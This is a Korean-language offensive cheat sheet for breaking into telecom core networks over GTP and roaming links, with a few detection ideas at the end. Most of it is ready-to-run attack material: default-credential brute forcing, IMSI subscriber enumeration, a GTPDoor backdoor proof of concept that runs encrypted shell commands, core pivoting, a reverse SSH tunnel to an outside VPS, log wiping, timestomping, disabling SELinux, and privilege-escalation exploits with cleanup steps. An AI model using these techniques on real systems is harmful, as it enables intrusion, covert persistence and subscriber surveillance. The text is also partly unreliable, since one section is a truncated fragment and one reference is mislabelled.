Telecom Network Exploitation (GTP / Roaming Environments)

1. Recon & Initial Access

1.1 Default OSS / NE Accounts

놀랍게도 많은 벤더 네트워크 요소는 root:admin, dbadmin:dbadmin, cacti:cacti, ftpuser:ftpuser와 같은 하드코딩된 SSH/Telnet 사용자와 함께 제공됩니다. 전용 단어 목록은 무차별 대입 성공률을 극적으로 증가시킵니다:

hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt

장치가 관리 VRF만 노출하는 경우, 먼저 점프 호스트를 통해 피벗합니다(아래 «SGSN Emu Tunnel» 섹션 참조).

1.2 GRX/IPX 내 호스트 검색

대부분의 GRX 운영자는 여전히 백본을 통해 ICMP echo를 허용합니다. masscan을 내장된 gtpv1 UDP 프로브와 결합하여 GTP-C 리스너를 신속하게 매핑합니다:

masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55

2. 구독자 열거하기 – cordscan

다음 Go 도구는 GTP-C Create PDP Context Request 패킷을 생성하고 응답을 기록합니다. 각 응답은 쿼리된 IMSI를 제공하는 현재 SGSN / MME를 드러내며, 때때로 구독자가 방문한 PLMN도 나타냅니다.

# Build
GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan

# Usage (typical):
./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap

주요 플래그:

• --imsi 대상 구독자 IMSI
• --oper 홈 / HNI (MCC+MNC)
• -w 원시 패킷을 pcap에 기록

이진 파일 내의 중요한 상수는 스캔을 확장하기 위해 패치할 수 있습니다:

pingtimeout       = 3   // seconds before giving up
pco               = 0x218080
common_tcp_ports  = "22,23,80,443,8080"

3. GTP를 통한 코드 실행 – GTPDoor

GTPDoor는 UDP 2123에 바인딩하고 모든 수신 GTP-C 패킷을 파싱하는 작은 ELF 서비스입니다. 페이로드가 사전 공유 태그로 시작하면 나머지는 복호화(AES-128-CBC)되어 /bin/sh -c를 통해 실행됩니다. stdout/stderr는 Echo Response 메시지 내에서 유출되어 외부 세션이 생성되지 않도록 합니다.

최소 PoC 패킷 (Python):

import gtpc, Crypto.Cipher.AES as AES
key = b"SixteenByteKey!"
cmd = b"id;uname -a"
enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00"))
print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))

탐지:

• SGSN IP로 불균형 에코 요청을 보내는 호스트
• 메시지 유형 = 1(에코)일 때 GTP 버전 플래그가 1로 설정됨 – 사양에서의 편차

4. 코어를 통한 피벗팅

4.1 sgsnemu + SOCKS5

OsmoGGSN은 실제 GGSN/PGW에 대한 PDP 컨텍스트를 설정할 수 있는 SGSN 에뮬레이터를 제공합니다. 협상이 완료되면, Linux는 로밍 피어에서 접근 가능한 새로운 tun0 인터페이스를 수신합니다.

sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \
-APN internet -c 1 -d
ip route add 172.16.0.0/12 dev tun0
microsocks -p 1080 &   # internal SOCKS proxy

적절한 방화벽 헤어핀을 사용하면 이 터널이 신호 전용 VLAN을 우회하고 데이터 평면에 직접 도달합니다.

4.2 포트 53을 통한 SSH 리버스 터널

DNS는 로밍 인프라에서 거의 항상 열려 있습니다. 내부 SSH 서비스를 VPS에 노출하여 :53에서 수신 대기하고 나중에 집에서 돌아오세요:

ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com

GatewayPorts yes가 VPS에서 활성화되어 있는지 확인하십시오.

5. 은밀한 채널

모든 임플란트는 타임스톱하여 이진 파일을 감시하고 충돌 시 재생성합니다.

6. 방어 회피 치트시트

# Remove attacker IPs from wtmp
utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp

# Disable bash history
export HISTFILE=/dev/null

# Masquerade as kernel thread
echo 0 > /proc/$$/autogroup   # hide from top/htop
printf '\0' > /proc/$$/comm    # appears as [kworker/1]

touch -r /usr/bin/time /usr/bin/chargen   # timestomp
setenforce 0                              # disable SELinux

7. 레거시 NE에서의 권한 상승

# DirtyCow – CVE-2016-5195
gcc -pthread dirty.c -o dirty && ./dirty /etc/passwd

# PwnKit – CVE-2021-4034
python3 PwnKit.py

# Sudo Baron Samedit – CVE-2021-3156
python3 exploit_userspec.py

정리 팁:

userdel firefart 2>/dev/null
rm -f /tmp/sh ; history -c

8. Tool Box

• cordscan, GTPDoor, EchoBackdoor, NoDepDNS – 이전 섹션에서 설명한 사용자 정의 도구.
• FScan : 인트라넷 TCP 스윕 (fscan -p 22,80,443 10.0.0.0/24)
• Responder : LLMNR/NBT-NS 악성 WPAD
• Microsocks + ProxyChains : 경량 SOCKS5 피벗
• FRP (≥0.37) : NAT 우회 / 자산 브리징

Detection Ideas

1. SGSN/GGSN 이외의 장치가 PDP 컨텍스트 요청을 생성하는 경우.
2. 비표준 포트(53, 80, 443)가 내부 IP로부터 SSH 핸드셰이크를 수신하는 경우.
3. 상응하는 에코 응답 없이 빈번한 에코 요청 – GTPDoor 비콘을 나타낼 수 있음.
4. 큰 비제로 식별자/시퀀스 필드를 가진 ICMP 에코 응답 트래픽의 높은 비율.

References

• Palo Alto Unit42 – Infiltration of Global Telecom Networks
• 3GPP TS 29.060 – GPRS Tunnelling Protocol (v16.4.0)
• 3GPP TS 29.281 – GTPv2-C (v17.6.0)